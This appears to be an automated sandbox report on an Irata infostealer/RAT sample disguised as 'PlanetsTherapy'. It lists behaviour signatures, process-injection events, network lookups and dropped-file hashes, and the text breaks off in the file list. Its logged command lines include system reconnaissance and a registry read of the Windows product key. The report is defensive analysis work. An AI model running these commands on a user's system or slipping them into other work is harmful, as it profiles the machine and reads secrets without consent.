Malware Analysis Report

2025-01-19 05:59

Sample ID 231219-syvv1agfe9
Target PlanetsTherapy.rar
SHA256 1055ef023406f8ca401e6b652583ca67e85724519100f323f48544ea6d635353
Tags
irata infostealer rat trojan persistence spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1055ef023406f8ca401e6b652583ca67e85724519100f323f48544ea6d635353

Threat Level: Known bad

The file PlanetsTherapy.rar was found to be: Known bad.

Malicious Activity Summary

irata infostealer rat trojan persistence spyware stealer

Irata payload

Irata

Checks computer location settings

Executes dropped EXE

Drops startup file

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Drops autorun.inf file

Unsigned PE

Enumerates physical storage devices

Detects videocard installed

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Collects information from the system

Enumerates processes with tasklist

Uses Task Scheduler COM API

Creates scheduled task(s)

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-19 15:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-19 15:32

Reported

2023-12-19 15:36

Platform

win7-20231215-en

Max time kernel

6s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1680 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1680 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1680 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1680 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1976 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1976 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1192 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1192 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1192 wrote to memory of 1996 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\tasklist.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe
PID 1976 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1976 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 1976 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe C:\Windows\system32\cmd.exe
PID 2020 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2020 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2020 wrote to memory of 1956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\PlanetsTherapy.exe"

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1100 --field-trial-handle=1120,15382437742827868295,4203629084994712479,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1680 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1680 get ExecutablePath

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\net.exe

net session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\resources\app.asar.unpacked\bind\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\more.com

more +1

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1640 --field-trial-handle=1120,15382437742827868295,4203629084994712479,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe

"C:\Users\Admin\AppData\Local\Temp\2Zl6YxigT6m9es7gVGqcrjeRAFn\PlanetsTherapy.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\script" --mojo-platform-channel-handle=1624 --field-trial-handle=1120,15382437742827868295,4203629084994712479,131072 --disable-features=PlzServiceWorker,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\System32\Wbem\WMIC.exe

wmic logicaldisk get size

C:\Windows\system32\more.com

more +1

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "echo %NUMBER_OF_PROCESSORS%"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get totalphysicalmemory | more +1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp

Files

\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\System.dll

MD5 0d7ad4f45dc6f5aa87f606d0331c6901
SHA1 48df0911f0484cbe2a8cdd5362140b63c41ee457
SHA256 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca
SHA512 c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\nsis7z.dll

MD5 80e44ce4895304c6a3a831310fbf8cd0
SHA1 36bd49ae21c460be5753a904b4501f1abca53508
SHA256 b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592
SHA512 c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\chrome_200_percent.pak

MD5 b51a78961b1dbb156343e6e024093d41
SHA1 51298bfe945a9645311169fc5bb64a2a1f20bc38
SHA256 4a438f0e209ac62ffa2c14036efdd5474b5ecaa7cbf54110f2e6153abdfb8be9
SHA512 23dedde25ad9cb5829d4b6092a815712788698c2a5a0aefb4299675d39f8b5e2844eabd1ea42332a0408bd234548f5af628e7e365ab26f3385ebfa158cdd921d

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\chrome_100_percent.pak

MD5 9c1b859b611600201ccf898f1eff2476
SHA1 87d5d9a5fcc2496b48bb084fdf04331823dd1699
SHA256 53102833760a725241841312de452c45e43edd60a122546105ab4020ccef591b
SHA512 1a8ec288e53b9d7e43d018995abe4e3d9c83d329d0561fbb7d022e8b79ffecf033e995b9bc6af352a71c646a1e8afba4addb54deab7455f24b7a279a3dd7c336

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\d3dcompiler_47.dll

MD5 9b2230c7c8c0a408abb35826bcea6d6d
SHA1 667a8c6837670d3986f28af67fc0da5a86aeba42
SHA256 cd8a882ad8b1530d9465fab130765c55d9d42a94649fa719d210230a1ca3e976
SHA512 6eeaf515f26ad6de5700fa9d461413b7f989f969f4605e49f6beba5a1baffe853251ed34f82a4b69678c5689609e29f4f0575fa8302069cbf5c73024140ff9db

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\ffmpeg.dll

MD5 9354dc789bb4c81984e13a0f75dc5c53
SHA1 a3d37a846c1f5d2521800dee3ff6f4102e6d72c1
SHA256 073266e8d1f63c5278cceafdb56371201007f44ac5a7e5ec7bfc332fc526760b
SHA512 e2e898856b09a7f3e45402377887ed5ac5fe9e92f51ddd44aec61e1302532b3f98a81d56a02e8732b3d4a198f7ae668caef82ec65cef15e2cbc377409d063f78

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\icudtl.dat

MD5 6195f8fd7f553b1461fb16dae16d9cba
SHA1 37f5ef00932c772b9b7bffa34dc98f570197591e
SHA256 126548b45870f7dda19ab1a5cd4fdc7bece16f550699764d2d2460c01c3222f2
SHA512 760d2e3ba2b59787776935eb73e275764231807c49c48f256335f8d7241b283bdb80b124455eccf1b37d71e50148dfa01bfeb4e71415bc30c8de94cc931b854c

C:\Users\Admin\AppData\Local\Temp\nsyFF9.tmp\7z-out\LICENSE.electron.txt

